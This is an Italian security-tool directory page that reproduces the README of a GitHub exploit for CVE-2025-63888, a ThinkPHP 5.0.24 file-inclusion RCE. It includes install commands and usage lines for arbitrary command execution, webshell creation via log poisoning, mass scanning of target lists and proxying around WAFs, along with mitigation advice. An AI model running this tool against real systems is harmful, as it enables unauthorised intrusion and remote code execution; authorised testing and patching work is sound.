Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/an5i/cve-2025-63888-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed TeamingSviluppo Payload
GitHuban5i/cve-2025-63888-exploit

cve-2025-63888-exploit

Strumento di ricerca sulla sicurezza per rilevare e testare CVE-2025-63888 (ThinkPHP 5.0.24 File Inclusion RCE vulnerability)

Vedi Repository
10429 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-63888 ThinkPHP 5.0.24 File Inclusion RCE Exploit

Uno strumento di ricerca sulla sicurezza per rilevare e testare la vulnerabilità CVE-2025-63888 in ThinkPHP 5.0.24, che consente l'esecuzione remota di codice tramite attacchi di inclusione di file.

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale. Utilizza questo strumento solo su sistemi di tua proprietà o per i quali hai un'esplicita autorizzazione scritta per testarli.

📋 Panoramica

CVE-2025-63888 è una vulnerabilità critica di esecuzione remota di codice in ThinkPHP 5.0.24. La vulnerabilità risiede nella funzione read situata in thinkphp/library/think/template/driver/File.php, consentendo agli aggressori di eseguire codice arbitrario attraverso attacchi di inclusione di file manipolando il percorso del template nella funzione view().

Punteggio CVSS: 9.8 (Critico)
Versione interessata: ThinkPHP 5.0.24 (versione esatta)
File vulnerabile: thinkphp/library/think/template/driver/File.php Metodo


Funzione vulnerabile:
read()

🔍 Caratteristiche

  • Rilevamento automatico di ThinkPHP: Identifica le installazioni e le versioni di ThinkPHP
  • Test della vulnerabilità: Verifica la vulnerabilità di inclusione file CVE-2025-63888
  • Scoperta degli endpoint: Trova automaticamente gli endpoint vulnerabili
  • Sfruttamento dell'inclusione file: Dimostra la capacità di inclusione file
  • Avvelenamento dei file di log: Tenta di avvelenare i file di log per RCE
  • Creazione di webshell: Crea webshell tramite inclusione file
  • Esecuzione di comandi: Esegue comandi arbitrari (per test autorizzati)
  • Supporto multithreading: Scansiona più target in parallelo
  • Supporto proxy: Bypassa restrizioni WAF/Cloudflare
  • Esportazione JSON: Risultati dettagliati in formato JSON

📦 Installazione

Prerequisiti

  • Python 3.6 o superiore
  • pip (gestore di pacchetti Python)

Installazione rapida

root@kitploit:~
# Clona il repository
git clone https://github.com/AN5I/cve-2025-63888-exploit.git
cd cve-2025-63888-exploit

# Installa le dipendenze
pip install -r requirements.txt

# Rendi lo script eseguibile (opzionale)
chmod +x cve_2025_63888_exploit.py

Alternativa: Download diretto

root@kitploit:~
# Scarica lo script
wget https://raw.githubusercontent.com/AN5I/cve-2025-63888-exploit/main/cve_2025_63888_exploit.py

# Installa le dipendenze
pip install requests

🚀 Utilizzo

Utilizzo base

root@kitploit:~
# Singolo target
python3 cve_2025_63888_exploit.py -u http://target.com

# Esegui comando personalizzato
python3 cve_2025_63888_exploit.py -u http://target.com -c "whoami"

# Molteplici target da file
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

# Con threading per scansione più veloce
python3 cve_2025_63888_exploit.py -u http://target.com -t 5

# Output verbose per debug
python3 cve_2025_63888_exploit.py -u http://target.com -v

Utilizzo di proxy

root@kitploit:~
# Proxy singolo
python3 cve_2025_63888_exploit.py -u http://target.com --proxy http://proxy:porta

# Multipli proxy da file
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

Opzioni della riga di comando

root@kitploit:~
-u, --url          URL del target
-f, --file         File contenente gli URL dei target (uno per riga)
-c, --command      Comando da eseguire (predefinito: id)
-t, --threads      Numero di thread (predefinito: 1)
-o, --output       File di output (predefinito: uknf_results.json)
-v, --verbose      Abilita logging verbose
--proxy            URL del proxy (es. http://127.0.0.1:8080)
--proxy-list       File contenente gli URL dei proxy (uno per riga)

📊 Output

Lo script genera un file JSON con i risultati dettagliati:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:05:35.763409",
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/index.php/index/index/view",
  "webshell_created": true,
  "webshell_path": "../../../runtime/log/2025/11/18.log"
}

🔬 Come funziona

  1. Fase di rilevamento: Scansiona gli indicatori del framework ThinkPHP
  2. Rilevamento versione: Tenta di identificare la versione di ThinkPHP (5.0.24)
  3. Test della vulnerabilità: Verifica la vulnerabilità di inclusione file
  4. Scoperta degli endpoint: Trova gli endpoint vulnerabili utilizzando la funzione view()
  5. Sfruttamento: Dimostra la capacità RCE tramite inclusione file

🛡️ Mitigazione

Se stai utilizzando ThinkPHP 5.0.24:

  1. Aggiorna immediatamente:

    • Aggiorna a ThinkPHP 5.0.25+ o successivo
    • Oppure aggiorna a ThinkPHP 6.x/7.x
  2. Implementa la validazione del percorso:

    • Aggiungi una validazione rigorosa del percorso nella funzione view()
    • Blocca i caratteri di traversamento delle directory (../, ..)
    • Limita i percorsi dei template a directory autorizzate
  3. Correzioni a livello di codice:

    • Valida i percorsi dei template prima di elaborarli
    • Usa realpath() per assicurarti che i file siano all'interno delle directory consentite
    • Implementa una whitelist di funzioni

📚 Riferimenti

  • CVE: CVE-2025-63888
  • GitHub Gist: Dettagli CVE-2025-63888
  • Articolo Yuque: Analisi dettagliata
  • Manuale ThinkPHP: Documentazione ufficiale

📖 Esempi

Esempio 1: Scansione singolo target

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com

Esempio 2: Molteplici target con output

root@kitploit:~
# Crea file dei target
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Esegui scansione
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

Esempio 3: Esecuzione comando personalizzato

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com -c "uname -a"

Esempio 4: Utilizzo proxy

root@kitploit:~
# Proxy singolo
python3 cve_2025_63888_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Multipli proxy da file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

🤝 Contribuire

I contributi sono benvenuti! Sentiti libero di inviare una Pull Request.

  1. Fai un fork del repository
  2. Crea il tuo ramo per la funzionalità (git checkout -b feature/AmazingFeature)
  3. Esegui il commit delle tue modifiche (git commit -m 'Aggiungi una AmazingFeature')
  4. Fai il push del ramo (git push origin feature/AmazingFeature)
  5. Apri una Pull Request

🐛 Problemi

Se incontri problemi o hai suggerimenti, per favore apri un issue su GitHub.

📝 Licenza

Questo progetto è concesso in licenza con la licenza MIT - vedi il file LICENSE per i dettagli.

⭐ Storico delle stelle

Se trovi utile questo strumento, considera di dargli una stella su GitHub!

⚖️ Aspetti legali

Questo strumento è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo programma. Gli utenti sono responsabili di assicurarsi di avere la corretta autorizzazione prima di testare qualsiasi sistema.

🙏 Riconoscimenti

  • Reporter originale della vulnerabilità: Master-0-0
  • Community di sicurezza ThinkPHP
  • Ricercatori di sicurezza che hanno contribuito all'analisi della vulnerabilità

💰 Donazioni

Se trovi utile questo strumento e desideri supportare il progetto:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

Grazie per il tuo supporto! 🙏

Scarica lo strumento